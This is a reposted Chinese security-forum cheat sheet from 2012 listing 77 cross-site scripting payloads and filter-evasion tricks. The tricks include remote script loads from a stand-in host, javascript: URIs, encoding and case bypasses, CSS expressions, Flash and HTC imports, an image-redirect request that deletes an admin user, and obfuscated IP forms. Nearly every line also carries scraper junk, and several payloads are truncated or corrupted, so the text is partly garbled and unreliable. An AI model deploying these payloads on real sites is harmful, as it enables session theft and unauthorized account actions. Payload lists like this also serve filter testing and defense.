貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。+ X# Y/ n- i {) D% I. [# F
2 [( l8 R& }8 W8 Y3 y g: Z5 o' G. } (1)普通的XSS JavaScript注入
7 l/ D2 @/ p* a/ w! r <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 r. J2 i- D9 U2 J5 ?
/ p! I+ I% _0 k7 a
(2)IMG标签XSS使用JavaScript命令
8 c3 o; J U" n$ e" G <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& ]+ S& L! z. E9 l# G5 h8 g$ _0 \/ q1 A3 D& M- V) X+ V
(3)IMG标签无分号无引号( M6 f; P6 q! u: h9 [! x& }
<IMG SRC=javascript:alert(‘XSS’)> a7 p: x# o0 N9 @3 K: h
& ~% X: O! X/ G- w" s# B) M (4)IMG标签大小写不敏感
+ `, y- A9 G* u1 H6 k+ ` <IMG SRC=JaVaScRiPt:alert(‘XSS’)>* u% t$ w6 y: |; e
1 @9 U! d! j1 ^; _8 z$ ^
(5)HTML编码(必须有分号)
6 r5 T7 Y1 D8 Q/ ^& B; ?4 P <IMG SRC=javascript:alert(“XSS”)>
+ u7 g+ O* A! g0 e
4 ~0 |1 I2 e: e5 J (6)修正缺陷IMG标签. q7 K+ y. f' S% ?) r
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
J( b' O; n' G. J& g5 P" c' F7 W. G- l w4 o7 r' |" C' B9 n9 f
(7)formCharCode标签(计算器)
' r# ~4 e6 E' h; w <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
4 B& |+ e! c) y0 ]$ _2 |% i) x/ v& D9 B/ r. ?# I
(8)UTF-8的Unicode编码(计算器)
7 K7 P6 |% y) k5 p- K/ ~ <IMG SRC=jav..省略..S')>
- _% |& T2 Q! Q. p3 b ?8 P: o) d6 b1 g2 [, z9 }
(9)7位的UTF-8的Unicode编码是没有分号的(计算器): G1 l' B3 a# @' e& A$ z
<IMG SRC=jav..省略..S')>, j% Y" d" \/ Q! B& B
! N" u' n( m. F! W6 \
(10)十六进制编码也是没有分号(计算器)+ g# [7 \: N4 h( \. T
<IMG SRC=java..省略..XSS')>
$ U7 h& i6 m$ b# F, o/ X) v; n8 q+ G m& I ]
(11)嵌入式标签,将Javascript分开. [, p6 e5 @( p+ T$ y. Q* h
<IMG SRC=”jav ascript:alert(‘XSS’);”>7 W; P) p$ y$ q; L% f( ~
! e3 _( X1 @$ @& ?5 ?% }7 U' ]4 w7 K
(12)嵌入式编码标签,将Javascript分开' x/ o+ c1 h a c# n" ^4 d+ W
<IMG SRC=”jav ascript:alert(‘XSS’);”> R& O3 `, D! i8 m& Q5 u
" A& X2 \+ p# t4 I" P2 f) Q$ K
(13)嵌入式换行符
. W: q6 Y- c# J+ U1 z <IMG SRC=”jav ascript:alert(‘XSS’);”>
' {$ L0 r3 P3 i9 y) V2 ~# Q- e3 |1 o
(14)嵌入式回车/ N1 F; P, y) b5 \4 X) M
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 k7 G2 D/ p# K+ |7 M- x0 f# p% j# ?6 G2 |. W, \! ^
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
+ l# J9 Q( R6 Z1 ^- R <IMG SRC=”javascript:alert(‘XSS‘)”>5 h& w# U, x, m7 k$ }
" H# U' I7 H3 k2 ^
(16)解决限制字符(要求同页面)2 U( r2 d0 T; P5 y
<script>z=’document.’</script>
. g" Y! A$ T9 i8 E- ~ <script>z=z+’write(“‘</script>
! T5 j$ {' W) u, I: ~ <script>z=z+’<script’</script>
1 ^( U! L1 h4 U <script>z=z+’ src=ht’</script>
3 o# F4 `1 c1 S( Y& Z& G& P4 J <script>z=z+’tp://ww’</script>
) q/ N! ]- {/ b4 I1 a9 z: `6 X$ W9 V <script>z=z+’w.shell’</script>, I( v$ h5 k( v* Q' p" ^' i" J
<script>z=z+’.net/1.’</script>
n: U0 q- u: p! t9 c <script>z=z+’js></sc’</script>
, v: o% l! C, i0 x0 ? <script>z=z+’ript>”)’</script>
* m6 i; F% n7 p/ D8 s M1 A <script>eval_r(z)</script>9 m/ Q8 W/ D$ j+ F ?, s
: |5 r, [' U! d
(17)空字符; P9 j1 v7 ^3 X! ~7 j
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out2 p1 D" p% N: K
' w. q9 K( F b- K' ~ q (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用' A9 h5 w6 `" \( p) w+ m
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out4 C* o. ~) L* a% S) d4 O
9 c5 `) M8 S* |9 u: b# }& v1 z
(19)Spaces和meta前的IMG标签. _; t5 f: \& x( G! n+ x7 n
<IMG SRC=” � javascript:alert(‘XSS’);”>
, S& U7 }3 g: S. R. X
. u+ x- V5 Q9 l L (20)Non-alpha-non-digit XSS
$ ~& ?+ k+ y7 C' r <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, z7 x7 b. F; ]( U2 p1 p0 \
* G6 S9 _0 V3 {) o (21)Non-alpha-non-digit XSS to 2, o6 Y/ z+ W$ s7 ]: |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>( w! y: V) [! }! c
% h! i& c" p" I- N' |3 G" E% A (22)Non-alpha-non-digit XSS to 3
+ B4 d( I" n! p% s6 q" A3 d <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* q! y3 q* O; C' j
# c0 ?2 U. j" Z" i" v3 x' C
(23)双开括号
% i9 r( L8 u& M( U ~' Z <<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ \ f" D* O/ Q. h8 ~9 s' Z3 {
/ `. F/ c( X! W2 O% W& i (24)无结束脚本标记(仅火狐等浏览器)
/ R; U9 ~# I A! c( b, Q/ H <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>$ j- h+ Z6 A( ]8 A
& H1 Q9 [5 {& x; Y/ j
(25)无结束脚本标记2: e2 m2 w( h8 d1 R; S E
<SCRIPT SRC=//3w.org/XSS/xss.js>
2 ?+ y! j8 t% R8 m9 J
0 T# b, n5 v7 O ~) {+ Z, n (26)半开的HTML/JavaScript XSS) {* s7 t1 R$ p ^+ B: Q' P: G, k
<IMG SRC=”javascript:alert(‘XSS’)”$ P- L1 U" W; c/ F) F2 z
) k6 n$ D. [* d A& P. v ?& N- d2 i (27)双开角括号
2 a4 a7 c3 K# N: ^; j& O- l <iframe src=http://3w.org/XSS.html <% F0 Q* ]; l( \* Z2 f
' w3 S- a1 D6 l: }4 y' @3 m* A0 \ (28)无单引号 双引号 分号' u q; q5 [6 z6 q# Q! s+ b6 E
<SCRIPT>a=/XSS/- I) V5 I$ Z" u6 _
alert(a.source)</SCRIPT>
, _$ a- m- p6 ^7 k6 U3 K _
b1 l+ L; x" b1 c: C1 t/ }* W (29)换码过滤的JavaScript
# u1 M+ k5 {# s0 p1 Z% X; } \”;alert(‘XSS’);//" P9 D, t, w) G& h: y
& d! j+ r; K, w8 u: R3 b$ n# M
(30)结束Title标签
! [$ }" C- O; T! k" ? </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% O: M- `. R) \! B3 j& H" \% U3 o @4 r, J% G9 x5 {6 C0 K$ b3 X# G
(31)Input Image
7 W" {. V7 r0 g" Y4 B% p4 s- V" g <INPUT SRC=”javascript:alert(‘XSS’);”>
+ v1 B5 q6 z$ i! l9 g3 {! b+ v% f
/ i, R8 F& }& X (32)BODY Image
9 m3 Y. X% g8 l <BODY BACKGROUND=”javascript:alert(‘XSS’)”>+ ~) m& Q8 P$ N- [) M- |" _8 k
7 r- @+ D7 |* W. T: X (33)BODY标签
* g9 W+ t) G* F# V <BODY(‘XSS’)>4 K+ W, o* d$ j) K2 E" \* i) {$ U- k
4 ]8 N7 ?0 `9 e. x; p9 c( R, \ (34)IMG Dynsrc
+ v- I- c# G: ^+ z: S& M ^9 L <IMG DYNSRC=”javascript:alert(‘XSS’)”>( ^' A. v% a4 s+ m2 K
$ R* {1 h$ ?- V8 A (35)IMG Lowsrc0 R. t; A% @( m2 ^: Q9 @
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
' v! o$ L. P, w; N6 V& {5 E# H5 \' x/ m% V3 z6 W/ ^
(36)BGSOUND* }* J2 E; p; j5 B+ u: y( Y# R
<BGSOUND SRC=”javascript:alert(‘XSS’);”>8 ~7 E: V7 q4 P! E; h
0 `3 g; |! a0 J; b& p. v
(37)STYLE sheet6 N6 ^) |- W& O& L2 ], b- S7 B& ]$ X
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ v6 R* y. a- E
4 n; J6 x3 V4 x/ Q (38)远程样式表' X# Y" ]5 D' S
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
8 N; \0 ]% i2 o/ _4 ?) l& t* x* L4 z$ z: H) a
(39)List-style-image(列表式)
+ m$ ]; }8 Y& x, n* f <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS5 D( _% R, S. N9 }
! K/ J" ], V( E (40)IMG VBscript
0 W4 @: G" w+ I! j <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
" K( c* H+ \, m' r6 T' v% A* Y B8 _4 D) f, A2 z& k0 K
(41)META链接url
6 {1 l% `* N" R, E7 x6 X <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
& Q- s5 u9 B( ]9 I! l" |& l
5 D; C! {- Y6 Z/ a (42)Iframe3 B. l6 D0 s7 _# }1 C* q% L
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
8 Z0 L; R& @ F, | o* n* n6 k9 e2 ~. G+ _: d
(43)Frame0 Q! S3 b* h7 j5 }* ~: V
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
6 ?- l: m4 ^3 H
; v, O J! _, _- [$ p (44)Table
7 y L6 K0 j4 ]) d) D, B r <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
0 }/ h! O! E# a
. f6 A( G6 p! W! m3 Q* ?+ F1 N$ b (45)TD5 p. Z2 @9 z6 `- {$ [. l2 r X
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>$ q) [, d3 S" t& ] `
" m/ Y- k$ m5 |# N
(46)DIV background-image
& e% J4 ^( ~; A& t# a q0 N" g <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* R. s& v# T- x/ V" k! p4 d r; W
" C2 d2 ]9 T: K
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
7 t( k" z) n0 `7 ]+ W$ {- S; z. } <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
& ~% o) j0 ?4 T$ U9 J4 ^
4 \' e8 p8 b6 m" F, z (48)DIV expression4 r3 x% ?% R7 V1 u
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
* K8 h$ t/ Z. U1 A0 K9 z. s# l5 c. q8 n! `( Y4 s1 B
(49)STYLE属性分拆表达+ a# e3 G/ a: q4 C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
6 Y- w/ {8 ~8 w; V1 `1 Y
) s. p1 |. f7 q6 \1 e. G \ (50)匿名STYLE(组成:开角号和一个字母开头)+ A: q+ E$ M9 L- h( ~1 R
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
9 T$ u: {, k6 M4 h; l
0 I2 e4 T% d4 n- Y( R (51)STYLE background-image
9 y$ U3 F! L7 @ <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>+ ?9 \3 ^1 k6 P4 ?
% o, Q8 `* @/ J+ i) O/ S9 r (52)IMG STYLE方式
9 o/ s4 h* j1 P2 t; F exppression(alert(“XSS”))’>$ |! ~. \6 s, B% x
' x+ x8 L& T# Z4 b {
(53)STYLE background
$ z" G# F+ d g) B& h Y. W <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* L+ A; S V7 L5 q, T4 K/ T+ f B+ T
(54)BASE+ G, L3 H9 y& C% a/ R) u' _1 k
<BASE HREF=”javascript:alert(‘XSS’);//”>
3 t. r0 d& V L
# R2 d+ K1 t4 ^3 w+ [: e6 u9 t (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
4 ?! p, u# i' _# e# T1 W5 e" f5 \ <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
# Z: k+ _! x! b6 w" d6 A$ j2 e- t
. `0 K* r6 J+ Z2 q6 i4 a, i% Q (56)在flash中使用ActionScrpt可以混进你XSS的代码) C( Y; p* t4 [3 j* P" C
a=”get”;: M; g& W0 Y: f$ }) v
b=”URL(\”";
z$ z" f, y( [6 {3 e7 Y$ a7 t c=”javascript:”;2 j, }& _, Z4 ^2 S1 Z9 \
d=”alert(‘XSS’);\”)”;
7 `* p. L0 F7 s5 x! M7 b eval_r(a+b+c+d);
; e# R6 U I9 l& D$ z+ G3 v, b* R" x; b3 ^7 L
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 F2 j, F4 J& q4 F+ ^+ [ <HTML xmlns:xss>
! C4 P& Z/ v" t' Z% J( a7 @ <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>+ H! Q1 G7 T9 k+ a s0 G$ \' m
<xss:xss>XSS</xss:xss>, U4 U; \& k2 L! T& C
</HTML>0 a' y9 M4 A6 V0 n
, b/ k, r: e, p4 }1 t F
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用; W" P9 V* h0 F" b
<SCRIPT SRC=””></SCRIPT>. M$ O6 v2 U0 L% L
$ P2 f1 D X& h
(59)IMG嵌入式命令,可执行任意命令
. Z- i: b4 a9 V5 f2 J8 f" [ <IMG SRC=”http://www.XXX.com/a.php?a=b”>
! `' |% j, U' \ L. t9 b/ N8 \8 \! C1 R6 a) e; W; }3 D
(60)IMG嵌入式命令(a.jpg在同服务器)
1 j+ b8 ?. e- | Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
# s& X1 R8 |& Y8 k7 u. s+ {/ s! B9 O
(61)绕符号过滤
* V0 g3 o! {" G: h2 I3 y <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' }& V- F9 r7 i( `+ B0 G0 I% R7 p) y6 t2 D1 m0 q
(62)
6 i. s# i0 b* b2 T& ] <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! \/ y5 L$ C6 {, I0 l" a
# Y2 x3 ?3 `) o: Z2 S5 I (63)
P1 ~# V3 Y3 K( j/ {8 U* b0 n <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
, R9 K5 |( [, c# W. X8 H2 t
+ J6 J0 ]( f) h' k8 M0 { \, @ (64)
: w0 M" c% P5 C. G# q <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
; v5 {5 [* A* I5 ]/ W2 d1 N& w) Q- T& g" J
(65)$ H+ V9 L- Z# K' F$ {
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>; G* W2 h, t- K. y9 Z$ m
2 |6 g3 H6 t7 a (66)7 [- C9 i( Y' g9 W
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 {- v; p/ t4 q; f T; T( Y+ a% Z1 B: m
(67)6 j. e7 B- X6 j( G3 g: `
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>7 G0 Y- S _) B- {$ e5 F
" D2 r( S5 i0 |8 Q5 [# f
(68)URL绕行
( G7 |: ?* e7 b" K) H- v <A HREF=”http://127.0.0.1/”>XSS</A>
4 K( b( [# ~0 m. X1 X' \8 M z- i% J
(69)URL编码+ u: T1 u6 |& _- |9 ]6 i
<A HREF=”http://3w.org”>XSS</A>
0 p/ W4 X$ p4 u5 P E) G& p. N" o% D2 w" ^1 H0 f- t2 b( Z5 e: q. r
(70)IP十进制
: S: a% T9 U. f+ ]( v <A HREF=”http://3232235521″>XSS</A>: e5 `8 v! ~) N; J. J
7 Z8 B! b& v0 J& ^& |0 _9 c; k (71)IP十六进制) c) @, K5 o2 L" k: [
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
+ v* w. Y- Z- P3 K$ [! G \$ z* e2 s/ ?# S
(72)IP八进制
& V5 k4 U* Q \$ p" g3 g <A HREF=”http://0300.0250.0000.0001″>XSS</A>
' }# J) k8 k$ W& \" Y) U! Y; a+ v" h1 v3 K6 G! H& o$ e
(73)混合编码 f* Z' o! Y# G4 w% f6 P! m
<A HREF=”h
_1 q/ p* B, ?5 d3 {0 Q8 ~! H tt p://6 6.000146.0×7.147/”">XSS</A>
0 ?: V' L& h: k4 M0 ^. q
- h+ I+ b+ {# y5 ^$ ] (74)节省[http:]
; L9 p3 q6 O% B1 a1 G2 K <A HREF=”//www.google.com/”>XSS</A>
! ?) r4 t' a8 _3 \, j" a2 ]+ i9 q2 U9 z9 Q: p& w
(75)节省[www]
9 E! W0 L+ ]3 D) }, v <A HREF=”http://google.com/”>XSS</A>' P# n, }0 t6 p8 M
( E- K! H+ f) d$ s0 `+ P# m
(76)绝对点绝对DNS8 u6 j* C+ M1 `$ h: V3 }
<A HREF=”http://www.google.com./”>XSS</A>0 ` T3 n; ] c6 G
2 ]8 ]6 R2 k. i% w
(77)javascript链接" a; [1 |) U2 G0 T3 b* z
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对